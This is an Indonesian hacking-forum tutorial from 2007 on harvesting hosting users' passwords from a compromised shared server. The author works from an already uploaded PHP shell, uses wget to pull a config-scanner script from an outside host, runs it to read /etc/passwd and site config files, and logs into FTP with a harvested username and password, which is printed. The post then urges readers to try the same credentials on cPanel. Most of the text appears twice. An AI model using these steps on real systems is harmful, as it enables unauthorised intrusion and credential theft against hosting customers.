Mendapatkan Password User menggunakan Config Scanner
Page 1 of 1
Mendapatkan Password User menggunakan Config Scanner
by dr.vaako Fri Nov 09, 2007 9:54 am
Dalam artikel ini kita akan mencoba mencari dan mendapatkan password dari
user yang berada pada suatu hosting server, dengan bermodalkan shell hasil
injectan kita, sapa tau kita bisa mendapatkan password sebenarnya dari user
tersebut.
CATATAN : Saya tidak bertanggung jawab atas penyalah gunaan artikel
ini, semuanya hanyalah untuk proses pembelajaran
Ok, tanpa basa-basi saya mulai saja.
Yang perlu di persiapkan :
1. Seperti biasa, komputer yang terkoneksi ke internet.
2. Shell atau website hasil injectan kita. ( saya anggap
rekan-rekan sudah tau gimana cara mendapatkannya )
3. Source untuk Scan file-file configurasi yang memuat
informasi user dan password. dapat di download di http://wawan.22web.net/download/sConfig.txt
4. Segelas Cofeemix dan Sebungkus Sampoerna Mild. heheh
Praktek :
1. Buka Shell atau website injectan anda, ( catatan :
file ini harus di upload ke dalam server yang akan kita scan user nya )
Contoh :
http://www.xxxhosting.us/phpwebsite/images/javascript/wysiwyg/display.php
( sebelumnya saya sudah upload phpshell ke dalam server
tersebut )
2. Download file sConfig.txt dari http://wawan.22web.net/download/sConfig.txt
( file ini bisa berada dimana saja dalam server target, tentunya dalam folder
yang mempunyai permission terhadap user yang kita gunakan skarang )
wget http://wawan.22web.net/download/sConfig.txt
##########################################################
wget wawan.22web.net/download/sConfig.txt
--03:59:52-- http://wawan.22web.net/download/sConfig.txt
=> `sConfig.txt'
Resolving wawan.22web.net... done.
Connecting to wawan.22web.net[209.51.196.242]:80...
connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
0K .....
184.39 KB/s
03:59:52 (184.39 KB/s) - `sConfig.txt' saved [6042]
#######################################################
Setelah sukses men-download file sConfig.txt, rename file tersebut
menjadi sConfig.php ( source codenya dalam bentuk PHP )
3. Jalankan file tersebut,
php sConfig.php
######################################################
mv sConfig.txt sConfig.php
php sConfig.php
Content-type: text/html
X-Powered-By: PHP/4.3.10
<html><title>Cyberbox</title><body>
<textarea>[+] Founded 224
entrys in /etc/passwd [+] Founded 224 readable public_html directories [~]
Searching for passwords in config.* files...
[+] /home/bavmus/public_html/main/include/config.php
dbbavas
[+]
/home/business/public_html/LINKEXCHANGE/siteadmin/config.php
.........................
.........................
[+] /home/etnkyus/public_html/config.php
133798
[FTP] etnkyus:133798 Success
.......................
#######################################################
Bingoo !!!, kita sudah mendapatkan 1 dari sekian banyak user yang ada
dalam server tersebut. selanjutnya kita coba connect ke server itu dengan user
dan password yang telah kita dapatkan tadi..
#######################################################
ftp> open
To xx.xx.xx.250
Connected to xx.xx.xx.250.
220---------- Welcome to Pure-FTPd [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 04:19. Server port: 21.
220 You will be disconnected after 15 minutes of
inactivity.
User (xx.xxx.xx.250none)): etnkyus
331 User etnkyus OK. Password required
Password:
230-User etnkyus has group access to: etnkyus 230
OK. Current restricted directory is /
ftp>
######################################################
ada kemungkinan user dan password yang sama di gunakan dalam Cpanel
website tersebut, so, silahkan dicoba sendiri.
Demikian Artikel singkat saya, semoga bermanfaat, Terus Mencoba, dan jangan
takut gagal.
user yang berada pada suatu hosting server, dengan bermodalkan shell hasil
injectan kita, sapa tau kita bisa mendapatkan password sebenarnya dari user
tersebut.
CATATAN : Saya tidak bertanggung jawab atas penyalah gunaan artikel
ini, semuanya hanyalah untuk proses pembelajaran
Ok, tanpa basa-basi saya mulai saja.
Yang perlu di persiapkan :
1. Seperti biasa, komputer yang terkoneksi ke internet.
2. Shell atau website hasil injectan kita. ( saya anggap
rekan-rekan sudah tau gimana cara mendapatkannya )
3. Source untuk Scan file-file configurasi yang memuat
informasi user dan password. dapat di download di http://wawan.22web.net/download/sConfig.txt
4. Segelas Cofeemix dan Sebungkus Sampoerna Mild. heheh
Praktek :
1. Buka Shell atau website injectan anda, ( catatan :
file ini harus di upload ke dalam server yang akan kita scan user nya )
Contoh :
http://www.xxxhosting.us/phpwebsite/images/javascript/wysiwyg/display.php
( sebelumnya saya sudah upload phpshell ke dalam server
tersebut )
2. Download file sConfig.txt dari http://wawan.22web.net/download/sConfig.txt
( file ini bisa berada dimana saja dalam server target, tentunya dalam folder
yang mempunyai permission terhadap user yang kita gunakan skarang )
wget http://wawan.22web.net/download/sConfig.txt
##########################################################
wget wawan.22web.net/download/sConfig.txt
--03:59:52-- http://wawan.22web.net/download/sConfig.txt
=> `sConfig.txt'
Resolving wawan.22web.net... done.
Connecting to wawan.22web.net[209.51.196.242]:80...
connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
0K .....
184.39 KB/s
03:59:52 (184.39 KB/s) - `sConfig.txt' saved [6042]
#######################################################
Setelah sukses men-download file sConfig.txt, rename file tersebut
menjadi sConfig.php ( source codenya dalam bentuk PHP )
3. Jalankan file tersebut,
php sConfig.php
######################################################
mv sConfig.txt sConfig.php
php sConfig.php
Content-type: text/html
X-Powered-By: PHP/4.3.10
<html><title>Cyberbox</title><body>
<textarea>[+] Founded 224
entrys in /etc/passwd [+] Founded 224 readable public_html directories [~]
Searching for passwords in config.* files...
[+] /home/bavmus/public_html/main/include/config.php
dbbavas
[+]
/home/business/public_html/LINKEXCHANGE/siteadmin/config.php
.........................
.........................
[+] /home/etnkyus/public_html/config.php
133798
[FTP] etnkyus:133798 Success
.......................
#######################################################
Bingoo !!!, kita sudah mendapatkan 1 dari sekian banyak user yang ada
dalam server tersebut. selanjutnya kita coba connect ke server itu dengan user
dan password yang telah kita dapatkan tadi..
#######################################################
ftp> open
To xx.xx.xx.250
Connected to xx.xx.xx.250.
220---------- Welcome to Pure-FTPd [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 04:19. Server port: 21.
220 You will be disconnected after 15 minutes of
inactivity.
User (xx.xxx.xx.250none)): etnkyus
331 User etnkyus OK. Password required
Password:
230-User etnkyus has group access to: etnkyus 230
OK. Current restricted directory is /
ftp>
######################################################
ada kemungkinan user dan password yang sama di gunakan dalam Cpanel
website tersebut, so, silahkan dicoba sendiri.
Demikian Artikel singkat saya, semoga bermanfaat, Terus Mencoba, dan jangan
takut gagal.
dr.vaako- mahasiswa
-
Number of posts : 36
Location : spooky island
Registration date : 2007-10-30
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum|
|
|